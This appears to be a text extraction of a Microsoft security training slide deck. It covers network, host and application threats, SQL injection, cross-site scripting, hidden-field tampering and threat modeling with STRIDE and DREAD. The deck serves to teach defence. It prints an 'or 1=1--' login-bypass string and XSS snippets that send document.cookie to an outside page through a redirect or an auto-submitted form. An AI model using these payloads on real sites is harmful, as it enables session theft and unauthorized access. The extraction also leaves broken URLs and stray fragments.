1. Threats and Threat Modeling
二○一七年四月十三日
Threats and Threat Modeling
Murat Gökşin Bakır
Microsoft Regional Director
Yage Ltd
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

2. Session Agenda Types of threats Threats against the application
二○一七年四月十三日
Session Agenda
Types of threats
Threats against the application
SQL injection
Cross-site scripting
Input tampering
Session hijacking
More
Threat modeling
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

3. Types of Threats Spoofed packets, etc.
二○一七年四月十三日
Types of Threats
Network
Host
Application
Threats against
the network
Spoofed packets, etc.
Threats against the host
Buffer overflows, illicit paths, etc.
Threats against the application
SQL injection, XSS, input tampering, etc.
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

4. Threats Against the Network
二○一七年四月十三日
Threats Against the Network
Threat
Examples
Information gathering
Port scanning
Using trace routing to detect network topologies
Using broadcast requests to enumerate subnet hosts
Eavesdropping
Using packet sniffers to steal passwords
Denial of service (DoS)
SYN floods
ICMP echo request floods
Malformed packets
Spoofing
Packets with spoofed source addresses
frame=true#c _004 i
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

5. Threats Against the Host
二○一七年四月十三日
Threats Against the Host
Threat
Examples
Arbitrary code execution
Buffer overflows in ISAPI DLLs (e.g., MS01-033)
Directory traversal attacks (MS00-078)
File disclosure
Malformed HTR requests (MS01-031)
Virtualized UNC share vulnerability (MS00-019)
Denial of service (DoS)
Malformed SMTP requests (MS02-012)
Malformed WebDAV requests (MS01-016)
Malformed URLs (MS01-012)
Brute-force file uploads
Unauthorized access
Resources with insufficiently restrictive ACLs
Spoofing with stolen login credentials
Exploitation of open ports and protocols
Using NetBIOS and SMB to enumerate hosts
Connecting remotely to SQL Server
frame=true#c _004 i
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

6. Threats Against the Application
二○一七年四月十三日
Threats Against the Application
Threat
Examples
SQL injection
Including a DROP TABLE command in text typed into an input field
Cross-site scripting
Using malicious client-side script to steal cookies
Hidden-field tampering
Maliciously changing the value of a hidden field
Eavesdropping
Using a packet sniffer to steal passwords and cookies from traffic on unencrypted connections
Session hijacking
Using a stolen session ID cookie to access someone else's session state
Identity spoofing
Using a stolen forms authentication cookie to pose as another user
Information disclosure
Allowing client to see a stack trace when an unhandled exception occurs
frame=true#c _004 i
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

7. 二○一七年四月十三日
SQL Injection
Exploits applications that use external input in database commands
Input from <form> fields
Input from query strings
The technique:
Find a <form> field or query string parameter used to generate SQL commands
Submit input that modifies the commands
Compromise, corrupt, and destroy data
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

8. How SQL Injection Works
二○一七年四月十三日
How SQL Injection Works
Model Query
SELECT COUNT (*) FROM Users
WHERE UserName=‘Jeff’
AND Password=‘imbatman’
Malicious Query
SELECT COUNT (*) FROM Users
WHERE UserName=‘’ or 1=1--
AND Password=‘’
"or 1=1" matches every
record in the table
"--" comments out the
remainder of the query
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

9. SQL Injection 二○一七年四月十三日 See demo script Demo2-1.doc
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

10. Cross-Site Scripting (XSS)
二○一七年四月十三日
Cross-Site Scripting (XSS)
Exploits applications that echo raw, unfiltered input to Web pages
Input from <form> fields
Input from query strings
The technique:
Find a <form> field or query string parameter whose value is echoed to the Web page
Enter malicious script and get an unwary user to navigate to the infected page
Steal cookies, deface and disable sites
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

11. How Cross-Site Scripting Works
二○一七年四月十三日
How Cross-Site Scripting Works
URL of the site targeted by the attack
<a href="
Search=<script language='javascript'>
document.location.replace ('
Cookie=‘ + document.cookie);
</script>">…</a>
Query string contains embedded JavaScript that redirects to attacker’s page and transmits cookies issued by Search.aspx in a query string
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

12. XSS – How it Works Hello, <% =Request.QueryString(“name”) %>
If Request.Form(“cookie”) <> “” Then
data = Request.Form(“cookie”)
‘ Do whatever I want with the cookie
End If
Response.Redirect
<FORM action= method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT>
The Bad URL

13. Cross-Site Scripting 二○一七年四月十三日 See demo script Demo2-2.doc
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

14. Cross-Site Scripting Attacks Based on <form> Tags (2)
二○一七年四月十三日
<a href= <FORM action= nwtraders.msft/data.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT> >
here
</a>
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

15. Hidden-Field Tampering
二○一七年四月十三日
Hidden-Field Tampering
HTTP is a stateless protocol
No built-in way to persist data from one request to the next
People are stateful beings
Want data persisted between requests
Shopping carts, user preferences, etc.
Web developers sometimes use hidden fields to persist data between requests
Hidden fields are not really hidden!
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

16. How HF Tampering Works Page contains this…
二○一七年四月十三日
How HF Tampering Works
type="hidden" prevents the field
from being seen on the page but
not in View Source
Page contains this…
<input type=“hidden” name="price"
value="$10,000">
Postback data should contain this…
price="$10,000"
Instead it contains this…
price="$1"
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

17. Session Hijacking Web applications use sessions to store state
二○一七年四月十三日
Session Hijacking
Web applications use sessions to store state
Sessions are private to individual users
Sessions can be compromised
Threat
Risk Factor
Theft and replay of session ID cookies
High*
Links to sites that use cookieless session state
Medium*
Predictable session IDs
Low*
Remote connection to state server service
Medium
Remote connection to state server database
Eavesdropping on state server connection
* Shorter session time-outs mitigate the risk by reducing the attack window
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

18. Identity Spoofing Security depends on authentication
二○一七年四月十三日
Identity Spoofing
Security depends on authentication
If authentication can be compromised, security goes out the window
Authentication can be compromised
Threat
Risk Factor
Theft of Windows authentication credentials
High
Theft of forms authentication credentials
Theft and replay of authentication cookies
Medium*
Dictionary attacks and password guessing
* Depends on the time-out values assigned to authentication cookies
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

19. Information Disclosure
二○一七年四月十三日
Information Disclosure
Which is the better error message?
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

20. Information Disclosure
二○一七年四月十三日
Information Disclosure
See demo script Demo2-3.doc
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

21. 二○一七年四月十三日
Threat Modeling
Structured approach to identifying, quantifying, and addressing threats
Essential part of development process
Just like specing and designing
Just like coding and testing
One technique presented here
There are others (e.g., OCTAVE) i
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

22. The Threat Modeling Process
二○一七年四月十三日
The Threat Modeling Process 1
Identify assets 2
Document architecture 3
Decompose application 4
Identify threats 5
Document threats 6
Rate threats
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

23. Identifying Assets 1 What is it that you want to protect?
Private data (e.g., customer list)
Proprietary data (e.g., intellectual property)
Potentially injurious data (e.g., credit card numbers, decryption keys)
These also count as "assets"
Integrity of back-end databases
Integrity of the Web pages (no defacement)
Integrity of other machines on the network
Availability of the application

24. Documenting Architecture2
Define what the app does and how it's used
Users view pages with catalog items
Users perform searches for catalog items
Users add items to shopping carts
Users check out
Diagram the application
Show subsystems
Show data flow
List assets

25. Example Asset #1 Asset #2 Asset #3 Web Server Database Server IIS
二○一七年四月十三日
Example
Asset #1
Asset #2
Asset #3
Web Server
Database Server
Firewall
IIS
ASP.NET
Login
Bob
Alice
Main
Bill
State
Asset #4
Asset #5
Asset #6
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

26. Decomposing the App 3 Refine the architecture diagram
Show authentication mechanisms
Show authorization mechanisms
Show technologies (e.g., DPAPI)
Diagram trust boundaries
Identify entry points
Begin to think like an attacker
Where are my vulnerabilities?
What am I going to do about them?

27. Windows Authentication
二○一七年四月十三日
Example
Forms Authentication
URL Authorization
Web Server
Database Server
Trust
Firewall
Bob
IIS
ASP.NET
Login
Alice
Main
Bill
State
DPAPI
Windows Authentication
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

28. Identifying Threats 4 Method #1: Threat lists Method #2: STRIDE
二○一七年四月十三日
Identifying Threats 4
Method #1: Threat lists
Start with laundry list of possible threats
Identify the threats that apply to your app
Method #2: STRIDE
Categorized list of threat types
Identify threats by type/category
Optionally draw threat trees
Root nodes represent attacker's goals
Trees help identify threat conditions
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

29. STRIDE Spoofing S Tampering T Repudiation R Information disclosure I
Can an attacker gain access using a false identity?
Tampering T
Can an attacker modify data as it flows through the application?
Repudiation R
If an attacker denies an exploit, can you prove him or her wrong?
Information disclosure I
Can an attacker gain access to private or potentially injurious data?
Denial of service D
Can an attacker crash or reduce the availiability of the system?
Elevation of privilege E
Can an attacker assume the identity of a privileged user?

30. Threat Trees OR AND AND Theft of Auth Cookies
二○一七年四月十三日
Threat Trees
Theft of
Auth Cookies
Obtain auth cookie to spoof identity OR
AND
AND
Unencrypted
Connection
Eavesdropping
Cross-Site
Scripting
XSS
Vulnerability
Cookies travel over unencrypted HTTP
Attacker uses sniffer to monitor HTTP traffic
Attacker possesses means and knowledge
Application is vulnerable to XSS attacks
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

31. Documenting Threats 5 Document threats using a template
二○一七年四月十三日
Documenting Threats 5
Document threats using a template
Theft of Auth Cookies by Eavesdropping on Connection
Threat target
Connections between browsers and Web server
Risk
Attack techniques
Attacker uses sniffer to monitor traffic
Countermeasures
Use SSL/TLS to encrypt traffic
Theft of Auth Cookies via Cross-Site Scripting
Threat target
Vulnerable application code
Risk
Attack techniques
Attacker sends with malicious link to users
Countermeasures
Validate input; HTML-encode output
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

32. Rating Threats 6 Simple model DREAD model
二○一七年四月十三日
Rating Threats 6
Simple model
DREAD model
Greater granularization of threat potential
Rates (prioritizes) each threat on scale of 1-15
Developed and widely used by Microsoft
Risk = Probability * Damage Potential
1-10 Scale
1 = Least probable
10 = Most probable
1-10 Scale
1 = Least damage
10 = Most damage
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

33. DREAD Damage potential D Reproducibility R Exploitability E
What are the consequences of a successful exploit? R
Reproducibility
Would an exploit work every time or only under certain circumstances? E
Exploitability
How skilled must an attacker be to exploit the vulnerability? A
Affected users
How many users would be affected by a successful exploit? D
Discoverability
How likely is it that an attacker will know the vulnerability exists?

34. DREAD, Cont. High (3) Medium (2) Low (1) Damage potential
二○一七年四月十三日
DREAD, Cont.
High (3)
Medium (2)
Low (1)
Damage potential
Attacker can retrieve extremely sensitive data and corrupt or destroy data
Attacker can retrieve sensitive data but do little else
Attacker can only retrieve data that has little or no potential for harm
Reproduc-ability
Works every time; does not require a timing window
Timing-dependent; works only within a time window
Rarely works
Exploitabilty
Bart Simpson could do it
Attacker must be somewhat knowledgeable and skilled
Attacker must be VERY knowledgeable and skilled
Affected users
Most or all users
Some users
Few if any users
Discoverabilty
Attacker can easily discover the vulnerability
Attacker might discover the vulnerability
Attacker will have to dig to discover the vulnerability
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

35. Example Threat D R E A Sum Prioritized Risks
二○一七年四月十三日
Example
Threat D R E A
Sum
Auth cookie theft (eavesdropping) 3 2 13
Auth cookie theft (XSS) 12
Potential for damage is high
(spoofed identities, etc.)
Cookie can be stolen any time, but is only useful until expired
Anybody can run a packet sniffer; XSS attacks require moderate skill
Prioritized
Risks
All users could be affected, but in reality most won't click malicious links
Easy to discover: just type a <script> block into a field
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

36. Additional Resources Sanctum AppScan Developer Edition (DE)
二○一七年四月十三日
Additional Resources
Sanctum AppScan Developer Edition (DE)
Automated unit testing tool that enables rapid development of Secure, Quality Web applications
Integrates directly into Visual Studio .NET
Real-time scanning of potential vulnerabilities
Comprehensive defect analysis of any ASP.NET site
For more product information
For a free product trial
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

37. Microsoft Developer Network
Patterns and Practices Guides

38. SafeApps™ Secure Code Assurance (SCA) engine
Replaces a manual security code expert code reviewer in a box.
Detects the programming errors that lead to security vulnerabilities. Assists in remediating the errors.
Detects programming errors that lead to viruses and worms
Prioritizes risk of each error from severe error to warning. Optimizes programmer’s time.
Guides the programmer to fix the source of error. Most programmers don’t know how to fix security errors.
Target user
Developer, QA Engineer, Security Engineer
Development teams that use SafeApps can drastically reduce the number of vulnerabilities in their software.

39. Resources/Next Steps
NGSCB is part of the Longhorn SDK
Ask your hardware and software vendors what NGSCB-enabled components they will provide
Visit our site and read the white papers and specs
Send questions to our Q&A alias
Sign up for updates
Subscribe to the NGSCB information newsletter for ongoing updates. Send blank to:

40. Purchase and review at: http://www.asp.net/whidbey
ASP.NET Whidbey Book
Now available for PDC bits
13 Chapters, 470 Pages
Topics Covered
Introduction, Tools & Architecture, Data Source Controls and Data Binding, GridView & DetailsView Controls, Master Pages & Navigation, Security, Personalization & Themes, Web Parts, Mobile Device Support, SQL Cache Invalidation, Precompilation, Confuguration & Administration and more.
Purchase and review at:

41. FxCop

42. Integer Arithmetic Vulns
Once rare, now common
Sun RPC xdr_array (
OpenSSH authentication (
Apache Chunked Encoding (
Microsoft JScript (
FreeBSD socket and system calls (
Snort TCP Packet Reassembly (
Microsoft MIDI Decoder (
OpenSSL ASN.1 Parsing (

43. © 2003-2004 Microsoft Corporation. All rights reserved.
二○一七年四月十三日
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.
© Microsoft Corporation. All rights reserved.
This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.